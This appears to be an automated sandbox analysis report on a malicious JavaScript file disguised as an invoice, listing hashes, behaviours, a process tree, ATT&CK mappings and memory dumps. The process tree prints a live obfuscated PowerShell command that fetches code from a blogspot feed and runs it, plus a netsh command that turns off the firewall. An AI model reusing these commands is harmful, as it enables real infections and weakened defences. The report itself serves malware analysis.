Overview

overview

10

Static

static

1

invoice 2566246817.js

windows7-x64

7

invoice 2566246817.js

windows10-2004-x64

10

Analysis

  • max time kernel
    126s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2023 09:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice 2566246817.js

  • Size

    106KB

  • MD5

    fc6d7a11059fee2eda2bab5e4c82c839

  • SHA1

    9907895c521bddd02573ca5e361490f017932dbe

  • SHA256

    39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c

  • SHA512

    1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39

  • SSDEEP

    384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\invoice 2566246817.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3264
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mixyktev\mixyktev.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB91E.tmp" "c:\Users\Admin\AppData\Local\Temp\mixyktev\CSCE933ADABE69543CF92F0E4F6AA34CC2.TMP"
          4⤵
            PID:1832
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:3464
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1920
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5044
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:2680
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4644
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Drops file in Windows directory
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:1584

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESB91E.tmp
      Filesize

      1KB

      MD5

      66abf638c5ccd0047a1314d5d5ab780d

      SHA1

      fbd19a1592b3128d46f72b062f2271ba0124db45

      SHA256

      75b699fb3022c7a8f60d0796d38e1e2441b7b290a6179d0abc03f883290c200b

      SHA512

      20d0ac09424150f532be770e1d4295cd208d1f9087b20a3942d881737b02a68af8d27e35c4cb8017acd3f9021d698682f602cc671cd2ea26debc754f76a6ab83

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pkxzqzw2.tbc.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\mixyktev\mixyktev.dll
      Filesize

      3KB

      MD5

      da689ab71c463204626c96d640fdd04f

      SHA1

      e6d7c707aa8c7b8ff6d9a77d3b65b1fad1d0f550

      SHA256

      c7b75985e44ffca76c0a3a1247b2569e476af0ce5cca114318283229730972aa

      SHA512

      0536c184b239c88fdb1422e3409edbc1cd81d9739f98bf4d33a56e0b494c4504286b67c56d7be76af577d5b4471a582108c86eaeb0e30329db3631f63ae19c87

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mixyktev\CSCE933ADABE69543CF92F0E4F6AA34CC2.TMP
      Filesize

      652B

      MD5

      417065c8c5b1106de9c84336bb6b03ec

      SHA1

      85a6c30a9ceb62c249e6f3fbfa61e4b37e362343

      SHA256

      ece8dffe480f09704ad8e54c9ae69f9d14443d1473d782051417a8cff86870fe

      SHA512

      7246308b0b73474db7f7251f62630aef158b29c155db1f292c512bee8565cebb9a0a384d521533d1bcf25dc322af6e6f40dfd4f51916682f125df87f54272d08

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mixyktev\mixyktev.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\mixyktev\mixyktev.cmdline
      Filesize

      369B

      MD5

      9bf3a3b86fcaca993083bdb0bab8af5d

      SHA1

      48b4a62becb3e697ce521bef74899a592ed6941d

      SHA256

      fbde79f5aa06ac3ac12e7393d7dfded6300fde0239306868f2dfd98af8628193

      SHA512

      a0bf940ee8ee8f591167b1ffdf5b8cb2f387be8b1f3a152a5e0f69c9beee52094127203db99d473a4c47090dca4f7bd4ca42ee66f37d018b31fcc1162699d5c1

      Download Submit

    • memory/1920-58-0x00000000055C0000-0x0000000005652000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1920-52-0x0000000074E40000-0x00000000755F0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1920-67-0x0000000006B40000-0x0000000006B90000-memory.dmp

      Filesize

      320KB

      Download

    • memory/1920-60-0x0000000005540000-0x00000000055A6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1920-68-0x0000000006D60000-0x0000000006F22000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/1920-69-0x0000000006C30000-0x0000000006CCC000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1920-40-0x0000000005A80000-0x0000000006024000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1920-70-0x0000000006C10000-0x0000000006C1A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1920-31-0x0000000000400000-0x000000000046C000-memory.dmp

      Filesize

      432KB

      Download

    • memory/1920-71-0x0000000074E40000-0x00000000755F0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1920-37-0x0000000000B90000-0x0000000000BFC000-memory.dmp

      Filesize

      432KB

      Download

    • memory/1920-72-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3264-45-0x000001D3A9080000-0x000001D3A9090000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3264-30-0x000001D390920000-0x000001D39093A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3264-29-0x000001D3908E0000-0x000001D3908EE000-memory.dmp

      Filesize

      56KB

      Download

    • memory/3264-13-0x000001D3AA040000-0x000001D3AA202000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/3264-27-0x000001D3A9070000-0x000001D3A9078000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3264-44-0x000001D3A9080000-0x000001D3A9090000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3264-36-0x00007FFF14340000-0x00007FFF14E01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3264-66-0x00007FFF14340000-0x00007FFF14E01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3264-53-0x000001D3A9080000-0x000001D3A9090000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3264-9-0x000001D3A9030000-0x000001D3A9052000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3264-10-0x00007FFF14340000-0x00007FFF14E01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3264-11-0x000001D3A9080000-0x000001D3A9090000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3264-12-0x000001D3A9080000-0x000001D3A9090000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4644-42-0x00000000014B0000-0x00000000014C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4644-63-0x00000000755F0000-0x0000000075BA1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/4644-43-0x00000000755F0000-0x0000000075BA1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/4644-38-0x00000000755F0000-0x0000000075BA1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/5044-59-0x00000000755F0000-0x0000000075BA1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/5044-41-0x0000000001210000-0x0000000001220000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5044-39-0x00000000755F0000-0x0000000075BA1000-memory.dmp

      Filesize

      5.7MB

      Download